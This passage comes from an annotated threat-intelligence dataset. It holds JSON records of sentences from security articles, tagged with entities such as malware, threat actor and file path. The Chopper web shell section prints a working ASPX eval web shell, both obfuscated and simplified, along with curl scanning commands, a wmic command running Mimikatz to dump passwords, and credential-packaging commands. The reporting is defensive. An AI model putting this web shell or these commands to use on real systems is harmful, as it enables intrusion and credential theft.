regularly.","entities":[{"id":49748,"label":"identity","start_offset":0,"end_offset":4}],"relations":[],"Comments":[]} -{"id":3896,"text":"Lastly, backups should be isolated from network connections.","entities":[],"relations":[],"Comments":[]} -{"id":3897,"text":"The fact sheet comes after numerous ransomware attacks on key critical infrastructures in the US and abroad, including the attack on Colonial Pipeline by DarkSide.","entities":[{"id":49749,"label":"location","start_offset":94,"end_offset":96},{"id":49751,"label":"threat-actor","start_offset":154,"end_offset":162},{"id":49750,"label":"identity","start_offset":133,"end_offset":150}],"relations":[{"id":864,"from_id":49751,"to_id":49750,"type":"targets"}],"Comments":[]} -{"id":3898,"text":"In 2019, Trend Micro conducted research analyzing cyberattacks by building and using a factory honeypot, mimicking a factory environment.","entities":[{"id":49752,"label":"TIME","start_offset":3,"end_offset":7},{"id":49753,"label":"identity","start_offset":9,"end_offset":20}],"relations":[],"Comments":[]} -{"id":3899,"text":"The study, Fake Company, Real Threats, revealed that over 20 attacks were observed during 240 days- six of which affected factory productivity.","entities":[],"relations":[],"Comments":[]} -{"id":3900,"text":"This shows how vulnerable smart factories are when it comes to various cyberattacks, such as ransomware.","entities":[],"relations":[],"Comments":[]} -{"id":3901,"text":"Ransomware incidents are federal crimes, according to the agency.","entities":[],"relations":[],"Comments":[]} -{"id":3902,"text":"Enterprises, especially critical infrastructure establishments, must report the attack to law enforcement to help bring the attackers to justice.","entities":[],"relations":[],"Comments":[]} -{"id":3903,"text":"Moreover, decision-makers and stakeholders should have a better understanding of cybersecurity and its role in securing their operations and the safety of consumers.","entities":[],"relations":[],"Comments":[]} -{"id":3904,"text":"To learn more about how to protect smart factories and their critical operations, read Trend Micro's expertly crafted best practices and solutions: Smart Factory Security Solutions Trend Micro Best Practices for Securing Smart Factories Tags Latest News | ICS OT | APT & Targeted Attacks | Ransomware | Articles, News, Reports | Cyber Threats","entities":[{"id":49754,"label":"identity","start_offset":87,"end_offset":98}],"relations":[],"Comments":[]} -{"id":3905,"text":"Web shells, in their simplicity and straightforwardness, are highly potent when it comes to compromising systems and environments.","entities":[],"relations":[],"Comments":[]} -{"id":3906,"text":"These malicious code pieces can be written in ASP, PHP, and JSP, or any script that can execute a system command with a parameter that can pass through the web.","entities":[],"relations":[],"Comments":[]} -{"id":3907,"text":"Web shells can be embedded on web servers and can be used by malicious actors to launch arbitrary code.","entities":[{"id":49755,"label":"attack-pattern","start_offset":81,"end_offset":102},{"id":49756,"label":"attack-pattern","start_offset":0,"end_offset":10}],"relations":[],"Comments":[]} -{"id":3908,"text":"In as little as 15 bytes, web shells can enable remote administration of an infected machine or system.","entities":[{"id":49757,"label":"attack-pattern","start_offset":26,"end_offset":36}],"relations":[],"Comments":[]} -{"id":3909,"text":"Threats such as this can be difficult to detect even with multiple security layers — especially if they are not consolidated. In this blog, we will dissect a targeted attack that made use of the Chopper ASPX web shell (detected by Trend Micro as Backdoor.ASP.WEBSHELL.UWMANA). Technical Analysis","entities":[{"id":49758,"label":"malware","start_offset":197,"end_offset":219},{"id":49759,"label":"malware","start_offset":248,"end_offset":276},{"id":49760,"label":"identity","start_offset":233,"end_offset":244}],"relations":[],"Comments":[]} -{"id":3910,"text":"Initial access","entities":[],"relations":[],"Comments":[]} -{"id":3911,"text":"Based on our investigation, the Chopper web shell is dropped via a system token, potentially via a Microsoft Exchange Server vulnerability.","entities":[{"id":49762,"label":"vulnerability","start_offset":99,"end_offset":138},{"id":49763,"label":"malware","start_offset":32,"end_offset":49}],"relations":[{"id":865,"from_id":49763,"to_id":49762,"type":"exploits"}],"Comments":[]} -{"id":3912,"text":"One notable vulnerability in the Microsoft Exchange Server is CVE-2020-0688, a remote code execution bug.","entities":[{"id":49764,"label":"SOFTWARE","start_offset":33,"end_offset":58},{"id":49765,"label":"vulnerability","start_offset":62,"end_offset":75},{"id":49766,"label":"attack-pattern","start_offset":79,"end_offset":100}],"relations":[{"id":866,"from_id":49764,"to_id":49765,"type":"has"},{"id":867,"from_id":49765,"to_id":49766,"type":"uses"}],"Comments":[]} -{"id":3913,"text":"Microsoft issued a patch for this vulnerability in February 2020.","entities":[{"id":49768,"label":"TIME","start_offset":52,"end_offset":65},{"id":49767,"label":"identity","start_offset":0,"end_offset":9}],"relations":[],"Comments":[]} -{"id":3914,"text":"However, the malicious actors behind this attack drop the Chopper web shell in the web directory folder to establish persistence.","entities":[{"id":49769,"label":"malware","start_offset":58,"end_offset":75}],"relations":[],"Comments":[]} -{"id":3915,"text":"Through the ASPX file, malicious actors can establish a foothold in affected public-facing Outlook Web App (OWA) servers and send remote commands through them.","entities":[{"id":49770,"label":"SOFTWARE","start_offset":91,"end_offset":112}],"relations":[],"Comments":[]} -{"id":3916,"text":"Outlook Web App (Web Directory) - D:\\Program Files\\Microsoft\\Exchange Server\\V15\\FrontEnd\\HttpProxy\\owa\\auth\\15.1.2044\\scripts\\premium\\premium.aspx","entities":[{"id":49771,"label":"SOFTWARE","start_offset":0,"end_offset":15},{"id":49772,"label":"FILEPATH","start_offset":36,"end_offset":149}],"relations":[],"Comments":[]} -{"id":3917,"text":"The attack features the following script:","entities":[],"relations":[],"Comments":[]} -{"id":3918,"text":"<%@ Page Language=\"Jscript\" Debug=true%>","entities":[],"relations":[],"Comments":[]} -{"id":3919,"text":"var","entities":[],"relations":[],"Comments":[]} -{"id":3920,"text":"System.Text.Encoding.GetEncoding(65001).GetString(System.Convert.FromBase64String(\"UmVxdWVzdC5Gb3JtWyJjb21tYW5kIl0=\"))","entities":[],"relations":[],"Comments":[]} -{"id":3921,"text":"var b=System.Text.Encoding.GetEncoding(65001).GetString(System.Convert.FromBase64String(\"dW5zYWZl\")); var c=eval(a,b); eval(c,b); %>","entities":[],"relations":[],"Comments":[]} -{"id":3922,"text":"When simplified, the malicious script looks like this, with the eval being the executor and the Request.Form acquiring the parameter to be executed:","entities":[],"relations":[],"Comments":[]} -{"id":3923,"text":"<%@ Page Language=\"Jscript\"%><%eval(Request.Form[\"Command\"],\"unsafe\");%> We’ve observed that in some cases, malicious actors insert this short script to avoid detection: Figure 1. A short script","entities":[],"relations":[],"Comments":[]} -{"id":3924,"text":"inserted by malicious actors to avoid detection ","entities":[],"relations":[],"Comments":[]} -{"id":3925,"text":"User Activity Checking Once Chopper successfully infects a system, the malicious actor will issue a query user (quser) command in an attempt to identify the primary user or those who are currently logged in as users in the system.","entities":[{"id":49773,"label":"malware","start_offset":28,"end_offset":35}],"relations":[],"Comments":[]} -{"id":3926,"text":"Based on our observation, the quser command was used routinely throughout the attack to determine active remote sessions.","entities":[],"relations":[],"Comments":[]} -{"id":3927,"text":" Figure 2.","entities":[],"relations":[],"Comments":[]} -{"id":3928,"text":"The quser command is used to identify active remote sessions.","entities":[],"relations":[],"Comments":[]} -{"id":3929,"text":" Deobfuscation technique","entities":[],"relations":[],"Comments":[]} -{"id":3930,"text":"To deploy its tools, it uses the expand command to extract package files dropped in the system.","entities":[],"relations":[],"Comments":[]} -{"id":3931,"text":"expand {filename}.ex_ {filename}.dat expand {filename}.ex_ {filename}.exe","entities":[],"relations":[],"Comments":[]} -{"id":3932,"text":"We saw a noticeable difference with this attack compared to other Chopper attacks — its use of the .dat file extension, which is commonly used for data storage purposes, such as in a user profile’s ntuser.dat.","entities":[{"id":49774,"label":"malware","start_offset":66,"end_offset":73}],"relations":[],"Comments":[]} -{"id":3933,"text":"In this particular Chopper attack, the .dat files are used as executables.","entities":[{"id":49775,"label":"malware","start_offset":19,"end_offset":26}],"relations":[],"Comments":[]} -{"id":3934,"text":"Lateral movement","entities":[{"id":49776,"label":"attack-pattern","start_offset":0,"end_offset":16}],"relations":[],"Comments":[]} -{"id":3935,"text":"It proceeded with copying the Chopper web shell into accessible shared folders in other hosts to gain access.","entities":[{"id":49777,"label":"malware","start_offset":30,"end_offset":47}],"relations":[],"Comments":[]} -{"id":3936,"text":"copy premium.aspx \"\\\\{hostname}\\d$\\Program Files\\Microsoft\\Exchange Server\\V15\\FrontEnd\\HttpProxy\\owa\\auth\\15.1.2044\\scripts\\premium","entities":[{"id":49778,"label":"FILEPATH","start_offset":19,"end_offset":132},{"id":49779,"label":"FILEPATH","start_offset":5,"end_offset":17}],"relations":[],"Comments":[]} -{"id":3937,"text":"It also scans for vulnerabilities across the network by using an installed tool, Hacktool.Win32.CATLIKE.A, and a legitimate cURL, C:\\temp\\curl.dat.","entities":[{"id":49780,"label":"malware","start_offset":81,"end_offset":105},{"id":49781,"label":"FILEPATH","start_offset":130,"end_offset":146}],"relations":[],"Comments":[]} -{"id":3938,"text":" It specifically scans for web server-related vulnerabilities and password weaknesses in Apache Tomcat, Citrix, and phpMyAdmin applications.","entities":[{"id":49783,"label":"SOFTWARE","start_offset":104,"end_offset":110},{"id":49784,"label":"SOFTWARE","start_offset":116,"end_offset":126},{"id":49782,"label":"SOFTWARE","start_offset":89,"end_offset":102}],"relations":[],"Comments":[]} -{"id":3939,"text":"Application\/Port Command Oracle WebLogic curl.dat -v -H 'Content-Type: text\/","entities":[{"id":49785,"label":"SOFTWARE","start_offset":27,"end_offset":42},{"id":49786,"label":"FILEPATH","start_offset":44,"end_offset":52}],"relations":[],"Comments":[]} -{"id":3940,"text":"xml;charset","entities":[],"relations":[],"Comments":[]} -{"id":3941,"text":"UTF-8","entities":[],"relations":[],"Comments":[]} -{"id":3942,"text":"http:\/\/{ip address\\]:7001\/wls-wsat\/CoordinatorPortType Oracle Console curl.dat -vv http:\/\/{ip address}:7001\/console\/j_security_check -d j_username={username}&j_password={password}&submit=Login\"","entities":[{"id":49789,"label":"FILEPATH","start_offset":72,"end_offset":81},{"id":49787,"label":"URL","start_offset":0,"end_offset":54},{"id":49788,"label":"URL","start_offset":85,"end_offset":134}],"relations":[],"Comments":[]} -{"id":3943,"text":" PHPMyAdmin curl.dat -vv --connect-timeout 2 {ip address}\/phpmyadmin Apache Tomcat s.dat -u http:\/\/{ip address}:8080\/manager\/html Ports 7001 9095 5556 8080 s.dat -i 10.217.229.189 -p {ports} Table 1.","entities":[{"id":49790,"label":"SOFTWARE","start_offset":71,"end_offset":84},{"id":49791,"label":"FILEPATH","start_offset":86,"end_offset":91},{"id":49792,"label":"FILEPATH","start_offset":95,"end_offset":132},{"id":49793,"label":"IPV4","start_offset":173,"end_offset":187}],"relations":[],"Comments":[]} -{"id":3944,"text":"Commands used to scan for web server-related vulnerabilities and passwords on certain applications and ports","entities":[],"relations":[],"Comments":[]} -{"id":3945,"text":"We saw that this attack also uses the WMI command line (wmic) utility to perform remote process execution on other infected endpoints.","entities":[],"relations":[],"Comments":[]} -{"id":3946,"text":" Execution of arbitrary commands via session id","entities":[],"relations":[],"Comments":[]} -{"id":3947,"text":"Successful exploitation of CVE-2020-0688 gives Chopper access to system privileges.","entities":[{"id":49794,"label":"vulnerability","start_offset":27,"end_offset":40},{"id":49795,"label":"malware","start_offset":47,"end_offset":54}],"relations":[],"Comments":[]} -{"id":3948,"text":"In one of the endpoints, it will drop and execute Trojan.Win32.PRIVESC.A.","entities":[{"id":49796,"label":"malware","start_offset":50,"end_offset":72}],"relations":[],"Comments":[]} -{"id":3949,"text":"This trojan requires to be run under a user with SeTcbPrivilege.","entities":[],"relations":[],"Comments":[]} -{"id":3950,"text":"It allows an attacker to see all Windows sessions and can execute arbitrary commands on the session via session id.","entities":[],"relations":[],"Comments":[]} -{"id":3951,"text":" Figure 3. Examples of arbitrary commands being performed on the session via session id Discovery","entities":[],"relations":[],"Comments":[]} -{"id":3952,"text":"For its discovery, it uses typical Windows command-line tools such as nltest, ping, whoami, netstat, net, nslookup, hostname, and tasklist, which are commonly used in other attacks.","entities":[{"id":49799,"label":"tools","start_offset":84,"end_offset":90},{"id":49797,"label":"tools","start_offset":70,"end_offset":76},{"id":49798,"label":"tools","start_offset":78,"end_offset":82},{"id":49804,"label":"tools","start_offset":131,"end_offset":139},{"id":49801,"label":"tools","start_offset":102,"end_offset":105},{"id":49802,"label":"tools","start_offset":107,"end_offset":115},{"id":49800,"label":"tools","start_offset":93,"end_offset":100},{"id":49803,"label":"tools","start_offset":117,"end_offset":125}],"relations":[],"Comments":[]} -{"id":3953,"text":"In addition, a publicly available JoeWare domain tool called LG.exe, which is quite popular among attackers and domain admins alike, was installed and used in the attack.","entities":[{"id":49805,"label":"FILEPATH","start_offset":61,"end_offset":67},{"id":49806,"label":"tools","start_offset":34,"end_offset":53}],"relations":[],"Comments":[]} -{"id":3954,"text":"Credential access","entities":[],"relations":[],"Comments":[]} -{"id":3955,"text":"For obtaining user credentials, the attackers used HackTool.MSIL.Mimikatz.AF, a modified version of the open-sourced application Mimikatz, using the following parameters: x, xxx, xxxx, xxxasd. wmic \/node:{ip address} process call create \"cmd.exe \/c c:\\users\\mpBD6D42.dat xxxasd -pass > c:\\users\\23.txt Collection","entities":[{"id":11981,"label":"FILEPATH","start_offset":238,"end_offset":245},{"id":49807,"label":"malware","start_offset":51,"end_offset":76},{"id":49808,"label":"tools","start_offset":129,"end_offset":137},{"id":49809,"label":"FILEPATH","start_offset":249,"end_offset":270},{"id":49810,"label":"FILEPATH","start_offset":286,"end_offset":301}],"relations":[],"Comments":[]} -{"id":3956,"text":"The attackers use wevtutil.exe to query security-related events from a target username and export it as a q.txt file.","entities":[{"id":49811,"label":"FILEPATH","start_offset":18,"end_offset":30},{"id":49812,"label":"FILEPATH","start_offset":106,"end_offset":111}],"relations":[],"Comments":[]} -{"id":3957,"text":"For packaging stolen credentials and other logs, it uses the makecab command instead of a third-party application such as rar.exe.","entities":[{"id":49814,"label":"FILEPATH","start_offset":122,"end_offset":129},{"id":49813,"label":"attack-pattern","start_offset":14,"end_offset":32}],"relations":[],"Comments":[]} -{"id":3958,"text":"· makecab a.txt > 111 · makecab aaa2.txt >1","entities":[{"id":49816,"label":"FILEPATH","start_offset":46,"end_offset":54},{"id":49815,"label":"FILEPATH","start_offset":17,"end_offset":22}],"relations":[],"Comments":[]} -{"id":3959,"text":"The attacker uses installed security components or applications as filenames to hide in plain sight.","entities":[],"relations":[],"Comments":[]} -{"id":3960,"text":"· C:\\Program Files\\Trend Micro\\ ams p.dat · C:\\Oracle\\Oracle.dat · C:\\Program Files\\McAfee\\MacAfee.dat These suspicious activities were seen via our XDR solution, which helped us monitor observable attack techniques and provided critical security alerts including anomalous file extension execution, remote execution via system tools, web shell-related activities, and potential exploit attacks.","entities":[{"id":49817,"label":"FILEPATH","start_offset":9,"end_offset":48},{"id":49818,"label":"FILEPATH","start_offset":58,"end_offset":78},{"id":49819,"label":"FILEPATH","start_offset":88,"end_offset":124}],"relations":[],"Comments":[]} -{"id":3961,"text":" Security recommendations","entities":[],"relations":[],"Comments":[]} -{"id":3962,"text":"Web shells can be embedded in systems via security gaps such as vulnerabilities.","entities":[{"id":49820,"label":"attack-pattern","start_offset":0,"end_offset":10}],"relations":[],"Comments":[]} -{"id":3963,"text":"Attackers will work to identify vulnerable applications used in systems to exploit them and install web shells for remote code execution or data exfiltration.","entities":[{"id":49821,"label":"attack-pattern","start_offset":115,"end_offset":136},{"id":49822,"label":"attack-pattern","start_offset":92,"end_offset":110},{"id":49823,"label":"attack-pattern","start_offset":140,"end_offset":157}],"relations":[],"Comments":[]} -{"id":3964,"text":"We provide some security recommendations to ensure that enterprises and organizations can defend against web shell attacks: ","entities":[{"id":49824,"label":"attack-pattern","start_offset":105,"end_offset":122}],"relations":[],"Comments":[]} -{"id":3965,"text":"Patch your systems and applications.","entities":[],"relations":[],"Comments":[]} -{"id":3966,"text":"Ensure proper vulnerability patches are applied for public-facing applications, such as Apache Tomcat, Oracle Web Logic Server, Microsoft Exchange Server, and PHPMyAdmin.","entities":[{"id":49827,"label":"SOFTWARE","start_offset":128,"end_offset":153},{"id":49826,"label":"SOFTWARE","start_offset":103,"end_offset":126},{"id":49825,"label":"SOFTWARE","start_offset":88,"end_offset":101},{"id":49828,"label":"SOFTWARE","start_offset":159,"end_offset":169}],"relations":[],"Comments":[]} -{"id":3967,"text":"Implement strong passwords.","entities":[],"relations":[],"Comments":[]} -{"id":3968,"text":"Do not use the same password for multiple applications or websites.","entities":[],"relations":[],"Comments":[]} -{"id":3969,"text":"Use multi-factor authentication whenever possible and regularly update it.","entities":[],"relations":[],"Comments":[]} -{"id":3970,"text":"Check for static keys in the IIS web.config file.","entities":[{"id":49829,"label":"FILEPATH","start_offset":33,"end_offset":43}],"relations":[],"Comments":[]} -{"id":3971,"text":" As observed on CVE-2020-0688, the use of static keys — as opposed to randomly generated keys — can allow an attacker to execute arbitrary code by tricking the server into deserializing ViewState data.","entities":[{"id":49830,"label":"vulnerability","start_offset":16,"end_offset":29},{"id":49831,"label":"attack-pattern","start_offset":121,"end_offset":143}],"relations":[{"id":868,"from_id":49830,"to_id":49831,"type":"uses"}],"Comments":[]} -{"id":3972,"text":" Enterprises and organizations should have comprehensive and efficient protection, detection, prevention, and remediation based on real-time, higher-confidence alerts to protect critical data and operations from sophisticated attacks and threats.","entities":[],"relations":[],"Comments":[]} -{"id":3973,"text":"A consolidated view of all security sensors provides a single-pane-of-glass view that will promote quick and thorough investigation and response.","entities":[],"relations":[],"Comments":[]} -{"id":3974,"text":" Trend Micro Solutions Trend Micro’s comprehensive XDR solution applies the most effective expert analytics to the deep data sets collected from Trend Micro solutions across the enterprise — including email, endpoints, servers, cloud workloads, and networks — making faster connections to identify and stop attacks.","entities":[{"id":49834,"label":"identity","start_offset":25,"end_offset":36},{"id":49835,"label":"identity","start_offset":147,"end_offset":158},{"id":49833,"label":"SOFTWARE","start_offset":3,"end_offset":24}],"relations":[],"Comments":[]} -{"id":3975,"text":"Powerful artificial intelligence (AI) and expert security analytics correlate data from customer environments and Trend Micro’s global threat intelligence to deliver fewer, higher-fidelity alerts, leading to better, early detection.","entities":[{"id":49836,"label":"identity","start_offset":114,"end_offset":125}],"relations":[],"Comments":[]} -{"id":3976,"text":"One console with one source of prioritized, optimized alerts supported with guided investigation simplifies the steps needed to fully understand the attack path and impact on the organization.","entities":[],"relations":[],"Comments":[]} -{"id":3977,"text":"Indicators of compromise Filename Path SHA-256 Detection Notes ss.exe C:\\temp\\ ee63b49aca1495a170ea7273316385b606f3fd2df1e48e9f4de0f241d98bd055 HackTool.Win32.CATLIKE.A Vulnerability Scanner LG.exe C:\\temp\\ C:\\hp\\ 5099264b16208d88c9bca960751f5e3de7a5420986fa0d7e2b2a6b16af3909e9 HackTool.Win32.JoeWare.A. JoeWare Local Group Manipulation tool LG.dat C:\\hp\\ 5099264b16208d88c9bca960751f5e3de7a5420986fa0d7e2b2a6b16af3909e9 HackTool.Win32.JoeWare.A. JoeWare Local Group Manipulation tool mpBD6D42.dat C:\\Users C:\\Perflogs C:\\hp C:\\temp e9be71848d1faa0c41db4c6a1e901747d98fb0b3cca027f8be85ea5e339b75e3 HackTool.MSIL.Mimikatz.AF Mimikatz Tags Endpoints | APT & Targeted Attacks | Research | Network | Articles, News, Reports","entities":[{"id":12061,"label":"SHA2","start_offset":227,"end_offset":291},{"id":12063,"label":"SHA2","start_offset":375,"end_offset":439},{"id":12060,"label":"SHA2","start_offset":87,"end_offset":151},{"id":12066,"label":"tools","start_offset":650,"end_offset":658},{"id":12065,"label":"SHA2","start_offset":557,"end_offset":621},{"id":49840,"label":"FILEPATH","start_offset":202,"end_offset":208},{"id":49845,"label":"malware","start_offset":623,"end_offset":648},{"id":49847,"label":"FILEPATH","start_offset":367,"end_offset":373},{"id":49848,"label":"FILEPATH","start_offset":507,"end_offset":519},{"id":49849,"label":"FILEPATH","start_offset":521,"end_offset":541},{"id":49850,"label":"FILEPATH","start_offset":542,"end_offset":555},{"id":49837,"label":"FILEPATH","start_offset":69,"end_offset":75},{"id":49842,"label":"FILEPATH","start_offset":219,"end_offset":225},{"id":49838,"label":"FILEPATH","start_offset":77,"end_offset":85},{"id":49839,"label":"malware","start_offset":153,"end_offset":177},{"id":49841,"label":"FILEPATH","start_offset":210,"end_offset":218},{"id":49843,"label":"malware","start_offset":293,"end_offset":317},{"id":49844,"label":"malware","start_offset":441,"end_offset":465},{"id":49846,"label":"FILEPATH","start_offset":359,"end_offset":365}],"relations":[{"id":869,"from_id":12060,"to_id":49839,"type":"indicates"},{"id":870,"from_id":49838,"to_id":49839,"type":"indicates"},{"id":871,"from_id":49837,"to_id":49839,"type":"indicates"},{"id":872,"from_id":12061,"to_id":49843,"type":"indicates"},{"id":873,"from_id":49842,"to_id":49843,"type":"indicates"},{"id":874,"from_id":49841,"to_id":49843,"type":"indicates"},{"id":875,"from_id":49840,"to_id":49843,"type":"indicates"},{"id":876,"from_id":49846,"to_id":49844,"type":"indicates"},{"id":877,"from_id":49847,"to_id":49844,"type":"indicates"},{"id":878,"from_id":12063,"to_id":49844,"type":"indicates"},{"id":879,"from_id":49848,"to_id":49845,"type":"indicates"},{"id":880,"from_id":49849,"to_id":49845,"type":"indicates"},{"id":881,"from_id":49850,"to_id":49845,"type":"indicates"},{"id":882,"from_id":12065,"to_id":49845,"type":"indicates"}],"Comments":[]} -{"id":3978,"text":"The Cybersecurity and Infrastructure Security Agency (CISA) and the National Institute for Standards and Technology (NIST) recently published “Defending Against Software Supply Chain Attacks”.","entities":[{"id":49852,"label":"identity","start_offset":68,"end_offset":122},{"id":49851,"label":"identity","start_offset":4,"end_offset":59}],"relations":[],"Comments":[]} -{"id":3979,"text":"The guideline provides an overview of software supply chain risk and how vendors and customers can identify and assess such risks using the NIST Cyber Supply Chain Risk Management (C-SCRM) Framework and the Secure Software Development Framework (SSDF).","entities":[],"relations":[],"Comments":[]} -{"id":3980,"text":"Software supply chains are an integral part of a large information and communications technology (ICT) supply chain framework.","entities":[],"relations":[],"Comments":[]} -{"id":3981,"text":"It is an ecosystem of retailers, distributors, and suppliers participating in the sale, delivery, and production of hardware, software, and managed services.","entities":[],"relations":[],"Comments":[]} -{"id":3982,"text":"An attack on the software supply chain happens when a cyber threat actor invades a vendor's network and uses malicious codes, compromising the software before the vendor sends it to their consumers.","entities":[],"relations":[],"Comments":[]} -{"id":3983,"text":"The compromised software will then put the customer's data or system at risk.","entities":[],"relations":[],"Comments":[]} -{"id":3984,"text":"According to the guideline, newly acquired software may be compromised from the get-go.","entities":[],"relations":[],"Comments":[]} -{"id":3985,"text":"It can also be compromised through a patch or hotfix.","entities":[],"relations":[],"Comments":[]} -{"id":3986,"text":"These threats affect all users of the tampered software, resulting in major consequences for government, critical infrastructure, and private sector software consumers.","entities":[],"relations":[],"Comments":[]} -{"id":3987,"text":"The guideline thoroughly explains the three most common methods threat groups use to infiltrate the supply chain.","entities":[],"relations":[],"Comments":[]} -{"id":3988,"text":"It also establishes a few recommendations for software customers and vendors to prevent and mitigate attacks as well as improve resilience against software supply chain attacks.","entities":[],"relations":[],"Comments":[]} -{"id":3989,"text":"The three most common methods are taking over the software update mechanism to deliver an updated software with malicious code, exploiting misconfigured access controls, and targeting publicly accessible code libraries, and inserting malicious code, which unknowing customers then download to their systems.","entities":[],"relations":[],"Comments":[]} -{"id":3990,"text":"The document also provides the following eight best practices for establishing a C-SCRM approach and applying it to software: Incorporating C-SCRM across the organization; Creating a formal C-SCRM program; Knowing and managing critical components and suppliers; Understanding the organization's supply chain; Working closely with key suppliers; Including key suppliers in resilience and improvement activities; Evaluating and monitoring throughout the supplier relationship; and Planning for the full life cycle.","entities":[],"relations":[],"Comments":[]} -{"id":3991,"text":" While the guideline gives thorough recommendations on preventing supply chain attacks, it is still vital for organizations to take extra measures to mitigate vulnerable software components.","entities":[],"relations":[],"Comments":[]} -{"id":3992,"text":"Organizations should also create a program that can manage and control their supply chain's vulnerabilities, minimizing the possibilities of attacks.","entities":[],"relations":[],"Comments":[]} -{"id":3993,"text":"In addition, organizations must know and understand the risks associated with supply chains and smart factories.","entities":[],"relations":[],"Comments":[]} -{"id":3994,"text":"To learn more about overlooked risks associated with supply chain and smart factories, read our expert team's proof of concept paper, \"Forward-looking security analysis of smart factories\".","entities":[],"relations":[],"Comments":[]} -{"id":3995,"text":"This extensive research also discusses feasible attack scenarios and recommended defense strategies.","entities":[],"relations":[],"Comments":[]} -{"id":3996,"text":" Tags Latest News | Cloud | APT & Targeted Attacks | Network | Articles, News, Reports | Cyber Threats","entities":[],"relations":[],"Comments":[]} -{"id":3997,"text":"The Cybersecurity and Infrastructure Security Agency (CISA) recently issued an alert regarding an advanced persistent threat (APT) compromising government agencies, critical infrastructures, and private sector organizations.","entities":[{"id":49853,"label":"identity","start_offset":4,"end_offset":59}],"relations":[],"Comments":[]} -{"id":3998,"text":"According to CISA, the APT actor is accountable for the compromise of the SolarWinds Orion supply chain.","entities":[{"id":49854,"label":"identity","start_offset":13,"end_offset":17},{"id":49855,"label":"SOFTWARE","start_offset":74,"end_offset":91}],"relations":[],"Comments":[]} -{"id":3999,"text":"The actor is also responsible for the abuse of commonly used authentication mechanisms.","entities":[{"id":49856,"label":"attack-pattern","start_offset":38,"end_offset":86}],"relations":[],"Comments":[]} -{"id":4000,"text":"The Agency then urged organizations to make identifying and addressing such threats a priority.","entities":[],"relations":[],"Comments":[]} -{"id":4001,"text":"Under the Presidential Policy Directive (PPD) 41, the agency, together with the Federal Bureau of Investigation (FBI), and the Office of the Director of National Intelligence (ODNI), formed a Cyber Unified Coordination Group (UCG).","entities":[{"id":49859,"label":"identity","start_offset":192,"end_offset":230},{"id":49857,"label":"identity","start_offset":80,"end_offset":117},{"id":49858,"label":"identity","start_offset":127,"end_offset":181}],"relations":[],"Comments":[]} -{"id":4002,"text":"This group aims to coordinate a \"whole-of-government\" response to the above-mentioned cyber incident.?","entities":[],"relations":[],"Comments":[]} -{"id":4003,"text":"A UCG is also formed for integrating private sector partners into incident response efforts.","entities":[{"id":49860,"label":"identity","start_offset":2,"end_offset":5}],"relations":[],"Comments":[]} -{"id":4004,"text":"In general, a Cyber UCG is created when a vital cyber incident affects critical infrastructure owners and operators.","entities":[{"id":49861,"label":"identity","start_offset":14,"end_offset":23}],"relations":[],"Comments":[]} -{"id":4005,"text":"These are determined by the Secretary of Homeland Security as possessing or operating critical infrastructure wherein a cyber incident could lead to a catastrophic regional or national effect on national security, economic security, or public health.","entities":[{"id":49862,"label":"identity","start_offset":28,"end_offset":58}],"relations":[],"Comments":[]} -{"id":4006,"text":"Supply chain attacks are quite risky and could result in real-world impacts.","entities":[],"relations":[],"Comments":[]} -{"id":4007,"text":"In a report done by Trend Micro entitled “Critical Infrastructures Exposed and at Risk: Energy and Water Industries”, researchers were able to expose vulnerabilities of human-machine interface (HMI) used in critical water and energy organizations.","entities":[{"id":49863,"label":"identity","start_offset":20,"end_offset":31}],"relations":[],"Comments":[]} -{"id":4008,"text":"They also showed real-world implications that these vulnerabilities have.","entities":[],"relations":[],"Comments":[]} -{"id":4009,"text":"Geopolitical risk is also a big concern for securing supply chains.","entities":[],"relations":[],"Comments":[]} -{"id":4010,"text":"To mitigate such risk, organizations must think globally and exert efforts to follow codes of local culture.","entities":[],"relations":[],"Comments":[]} -{"id":4011,"text":"Organizations need to have a deeper understanding of regional and national policies to ensure the safety of the supply chain.","entities":[],"relations":[],"Comments":[]} -{"id":4012,"text":"Read our three-part series on smart factories from the perspective of supply chain disruptions to learn more about supply chain cybersecurity.","entities":[],"relations":[],"Comments":[]} -{"id":4013,"text":" Tags Latest News | ICS OT | APT & Targeted Attacks | IoT |","entities":[],"relations":[],"Comments":[]} -{"id":4014,"text":"Articles, News, Reports","entities":[],"relations":[],"Comments":[]} -{"id":4015,"text":"Earth Centaur, previously known as Tropic Trooper, is a long-running cyberespionage threat group that has been active since 2011.","entities":[{"id":49866,"label":"TIME","start_offset":118,"end_offset":128},{"id":49865,"label":"threat-actor","start_offset":35,"end_offset":49},{"id":49864,"label":"threat-actor","start_offset":0,"end_offset":13}],"relations":[{"id":883,"from_id":49864,"to_id":49865,"type":"duplicate-of"}],"Comments":[]} -{"id":4016,"text":"In July 2020, we noticed interesting activity coming from the group, and we have been closely monitoring it since.","entities":[{"id":49867,"label":"TIME","start_offset":3,"end_offset":12}],"relations":[],"Comments":[]} -{"id":4017,"text":"The actors seem to be targeting organizations in the transportation industry and government agencies related to transport.","entities":[],"relations":[],"Comments":[]} -{"id":4018,"text":" We observed that the group tried to access some internal documents (such as flight schedules and documents for financial plans) and personal information on the compromised hosts (such as search histories).","entities":[],"relations":[],"Comments":[]} -{"id":4019,"text":" Currently, we have not discovered substantial damage to these victims as caused by the threat group.","entities":[],"relations":[],"Comments":[]} -{"id":4020,"text":"However, we believe that it will continue collecting internal information from the compromised victims and that it is simply waiting for an opportunity to use this data.","entities":[],"relations":[],"Comments":[]} -{"id":4021,"text":"Through long-term monitoring, we learned that this threat group is proficient at red teamwork.","entities":[],"relations":[],"Comments":[]} -{"id":4022,"text":"The group knows how to bypass security settings and keep its operation unobstructive.","entities":[],"relations":[],"Comments":[]} -{"id":4023,"text":"Depending on the target, it uses backdoors with different protocols, and it can also use the reverse proxy to bypass the monitoring of network security systems.","entities":[],"relations":[],"Comments":[]} -{"id":4024,"text":"The usage of the open-source frameworks also allows the group to develop new backdoor variants efficiently.","entities":[],"relations":[],"Comments":[]} -{"id":4025,"text":"We expand on these techniques and other capabilities in the following sections.","entities":[],"relations":[],"Comments":[]} -{"id":4026,"text":" More importantly, we believe the activities we observed are just the tip of the iceberg and their targets might be expanded to other industries that are related to transportation.","entities":[],"relations":[],"Comments":[]} -{"id":4027,"text":"It is our aim, through this article, to encourage enterprises to review their own security setting and protect themselves from damage and compromise.","entities":[],"relations":[],"Comments":[]} -{"id":4028,"text":" Overview of Earth Centaur’s infection chain","entities":[{"id":49868,"label":"threat-actor","start_offset":14,"end_offset":27}],"relations":[],"Comments":[]} -{"id":4029,"text":"Based on our investigation, we found that the intrusion process used by Earth Centaur can be separated into several stages, which are shown in Figure 